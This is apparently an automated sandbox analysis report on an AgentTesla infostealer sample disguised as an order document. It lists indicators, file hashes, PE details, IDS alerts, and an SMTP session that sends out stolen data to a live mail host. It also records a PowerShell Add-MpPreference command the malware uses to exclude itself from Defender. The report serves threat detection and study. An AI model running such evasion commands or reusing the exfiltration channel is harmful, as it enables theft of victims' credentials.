                                                                                          • 199.79.62.115
                                                                                          PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          PUBLIC-DOMAIN-REGISTRYUSQFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          new booking 9086432659087.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 162.251.80.30
                                                                                          rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 103.76.231.42
                                                                                          LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 199.79.62.115
                                                                                          RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 162.251.80.30
                                                                                          Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 199.79.62.115
                                                                                          Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 199.79.62.115
                                                                                          shipping doc -GY298035826.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 162.251.80.30

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER#023_2024.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ORDER#023_2024.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2232
                                                                                          Entropy (8bit):5.379401388151058
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:fLHxvIIwLgZ2KRHWLOuggs
                                                                                          MD5:1F07DBFC960DDEA7295F1A6FD48057B1
                                                                                          SHA1:05F3052BCC168B834CEA8EA48E050020C5CAD8F5
                                                                                          SHA-256:72F8629C56744FE3E1E3C1B705EF6355E59E5C96B4924427EE430C9F9EF46809
                                                                                          SHA-512:D94DF9A81FAF494891837FA73FECEF1D8226E18978A2EEA534409724409E13C6DACAB32E00C494FB2A140573E1C152EE407A0E070515B3802A06649690B1C491
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mbqvnce.ao0.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcdeezer.3t4.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ma5vwock.gkh.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qu2utjsw.0pj.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.757710857487303
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:ORDER#023_2024.exe
                                                                                          File size:642'048 bytes
                                                                                          MD5:cb93d77357df18ffb788e73e7f9e8ba1
                                                                                          SHA1:0fa0e09a4905239dca028b58a0e6523e8c91498c
                                                                                          SHA256:3591cadebdbbaee9e75158d085435cf81ba8cdfc5c92b050275f9b490ee60998
                                                                                          SHA512:3cf47d515a029681d551d23de1743835cf4dc94df275a6cd4c341c2bbc61837167068fc4e228b7b312d5d78b663587cdf7a45174df111e0ab0546294f7da34ef
                                                                                          SSDEEP:12288:nIR4R52J+XtwoX4D7JtUb4KREvG/4vou+bQy91bDVus1Bja5ickMIR:nIeeTooJtUsKi+QoLh9p5Y5icTI
                                                                                          TLSH:6BD402481E49E812C95163340FB2F6B8117C6FDEE90193235FEE6EEFF86A9244C492D1
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....qNg..............0..t...T........... ........@.. ....................... ............@................................

                                                                                          File Icon

                                                                                          Icon Hash:033424c4c199d839

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4991fa
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x674E7119 [Tue Dec 3 02:46:49 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x991a80x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x4ca8.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x972000x97400a87cb48f4d56db3267b072228892c834False0.9267997804752066data7.767634101805021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x9a0000x4ca80x50007b6db1034c49ef61784ac56eacc4d534False0.9177734375data7.667114653481911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xa00000xc0x4008f06266fd3c5c9f07f6bf8fbfcbf5ffeFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x9a1000x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                          RT_GROUP_ICON0x9e80c0x14data1.05
                                                                                          RT_VERSION0x9e8300x278data0.4699367088607595
                                                                                          RT_MANIFEST0x9eab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-04T22:02:06.918218+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449734199.79.62.115587TCP
                                                                                          2024-12-04T22:02:06.918218+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449734199.79.62.115587TCP
                                                                                          2024-12-04T22:03:40.849487+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449734199.79.62.115587TCP
                                                                                          2024-12-04T22:03:40.849487+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.449734199.79.62.115587TCP
                                                                                          2024-12-04T22:03:40.849487+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449734199.79.62.115587TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 4, 2024 22:02:03.128299952 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:03.248090029 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:03.248171091 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:04.469135046 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:04.472465992 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:04.592391968 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:04.849436998 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:04.850497961 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:04.970441103 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:05.226970911 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:05.227348089 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:05.347171068 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:05.729644060 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:05.730637074 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:05.850706100 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:06.107299089 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:06.110698938 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:06.232547045 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:06.535120964 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:06.535592079 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:06.655337095 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:06.917433023 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:06.918180943 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:06.918217897 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:06.918226957 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:06.918251038 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:02:07.040119886 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:07.040184021 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:07.040200949 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:07.040210009 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:07.405225039 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:02:07.457355022 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:03:40.270678043 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:03:40.391665936 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:03:40.849302053 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:03:40.849487066 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:03:40.849517107 CET58749734199.79.62.115192.168.2.4
                                                                                          Dec 4, 2024 22:03:40.849570036 CET49734587192.168.2.4199.79.62.115
                                                                                          Dec 4, 2024 22:03:40.969391108 CET58749734199.79.62.115192.168.2.4

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 4, 2024 22:02:00.250247002 CET5431753192.168.2.41.1.1.1
                                                                                          Dec 4, 2024 22:02:01.242022038 CET5431753192.168.2.41.1.1.1
                                                                                          Dec 4, 2024 22:02:02.238636017 CET5431753192.168.2.41.1.1.1
                                                                                          Dec 4, 2024 22:02:03.119982958 CET53543171.1.1.1192.168.2.4
                                                                                          Dec 4, 2024 22:02:03.119997978 CET53543171.1.1.1192.168.2.4
                                                                                          Dec 4, 2024 22:02:05.029109001 CET53543171.1.1.1192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 4, 2024 22:02:00.250247002 CET192.168.2.41.1.1.10x23ceStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 22:02:01.242022038 CET192.168.2.41.1.1.10x23ceStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 22:02:02.238636017 CET192.168.2.41.1.1.10x23ceStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 4, 2024 22:02:03.119982958 CET1.1.1.1192.168.2.40x23ceNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 22:02:03.119997978 CET1.1.1.1192.168.2.40x23ceNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 22:02:05.029109001 CET1.1.1.1192.168.2.40x23ceNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false

                                                                                          SMTP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Dec 4, 2024 22:02:04.469135046 CET58749734199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 05 Dec 2024 02:32:04 +0530
                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                          220 and/or bulk e-mail.
                                                                                          Dec 4, 2024 22:02:04.472465992 CET49734587192.168.2.4199.79.62.115EHLO 585948
                                                                                          Dec 4, 2024 22:02:04.849436998 CET58749734199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 585948 [8.46.123.228]
                                                                                          250-SIZE 52428800
                                                                                          250-8BITMIME
                                                                                          250-PIPELINING
                                                                                          250-PIPECONNECT
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-STARTTLS
                                                                                          250 HELP
                                                                                          Dec 4, 2024 22:02:04.850497961 CET49734587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                                                          Dec 4, 2024 22:02:05.226970911 CET58749734199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Dec 4, 2024 22:02:05.729644060 CET58749734199.79.62.115192.168.2.4235 Authentication succeeded
                                                                                          Dec 4, 2024 22:02:05.730637074 CET49734587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                                                          Dec 4, 2024 22:02:06.107299089 CET58749734199.79.62.115192.168.2.4250 OK
                                                                                          Dec 4, 2024 22:02:06.110698938 CET49734587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                                                          Dec 4, 2024 22:02:06.535120964 CET58749734199.79.62.115192.168.2.4250 Accepted
                                                                                          Dec 4, 2024 22:02:06.535592079 CET49734587192.168.2.4199.79.62.115DATA
                                                                                          Dec 4, 2024 22:02:06.917433023 CET58749734199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                          Dec 4, 2024 22:02:06.918251038 CET49734587192.168.2.4199.79.62.115.
                                                                                          Dec 4, 2024 22:02:07.405225039 CET58749734199.79.62.115192.168.2.4250 OK id=1tIwVa-000xsl-2K
                                                                                          Dec 4, 2024 22:03:40.270678043 CET49734587192.168.2.4199.79.62.115QUIT
                                                                                          Dec 4, 2024 22:03:40.849302053 CET58749734199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:16:01:55
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Users\user\Desktop\ORDER#023_2024.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER#023_2024.exe"
                                                                                          Imagebase:0x760000
                                                                                          File size:642'048 bytes
                                                                                          MD5 hash:CB93D77357DF18FFB788E73E7F9E8BA1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:16:01:57
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
                                                                                          Imagebase:0x680000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:16:01:57
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Users\user\Desktop\ORDER#023_2024.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER#023_2024.exe"
                                                                                          Imagebase:0x1e0000
                                                                                          File size:642'048 bytes
                                                                                          MD5 hash:CB93D77357DF18FFB788E73E7F9E8BA1
                                                                                          Has elevated privileges:true
